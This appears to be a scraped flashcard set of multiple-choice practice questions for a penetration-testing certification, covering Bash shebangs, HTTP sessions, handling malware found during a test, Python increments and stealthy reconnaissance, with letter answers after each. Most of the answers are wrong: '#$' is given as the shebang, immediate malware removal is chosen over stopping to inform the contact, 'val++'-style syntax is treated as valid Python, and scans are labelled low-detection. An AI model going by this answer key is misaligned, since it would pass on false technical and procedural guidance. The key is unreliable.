When developing a shell script intended for interpretation in Bash, the interpreter /bin/bash should be explicitly specified. Which of the following character combinations should be used on the first line of the script to accomplish this goal? A. <# B. <$ C. ## D. #$ E. #!

d

Which of the following should a penetration tester attack to gain control of the state in the HTTP protocol after the user is logged in? A. HTTPS communication B. Public and private keys C. Password encryption D. Sessions and cookies

d

Which of the following should a penetration tester do NEXT after identifying that an application being tested has already been compromised with malware? A. Analyze the malware to see what it does. B. Collect the proper evidence and then remove the malware. C. Do a root-cause analysis to find out how the malware got in. D. Remove the malware immediately. E. Stop the assessment and inform the emergency contact.

d

Which of the following expressions in Python increase a variable val by one (Choose two.) A. val++ B. +val C. val=(val+1) D. ++val E. val=val++ F. val+=1

df

A penetration tester wants to perform reconnaissance without being detected. Which of the following activities have a MINIMAL chance of detection? (Choose two.) A. Open-source research B. A ping sweep C. Traffic sniffing D. Port knocking E. A vulnerability scan F. An Nmap scan

ef


Ensembles d'études connexes

C++ Chapter 1 Introduction to Computers & Programming

View Set

Final Exam Review Operating System Security

View Set

NCLEX Prep Content Mastery Final Exam

View Set

COMM 27: Public Speaking - Exam #2

View Set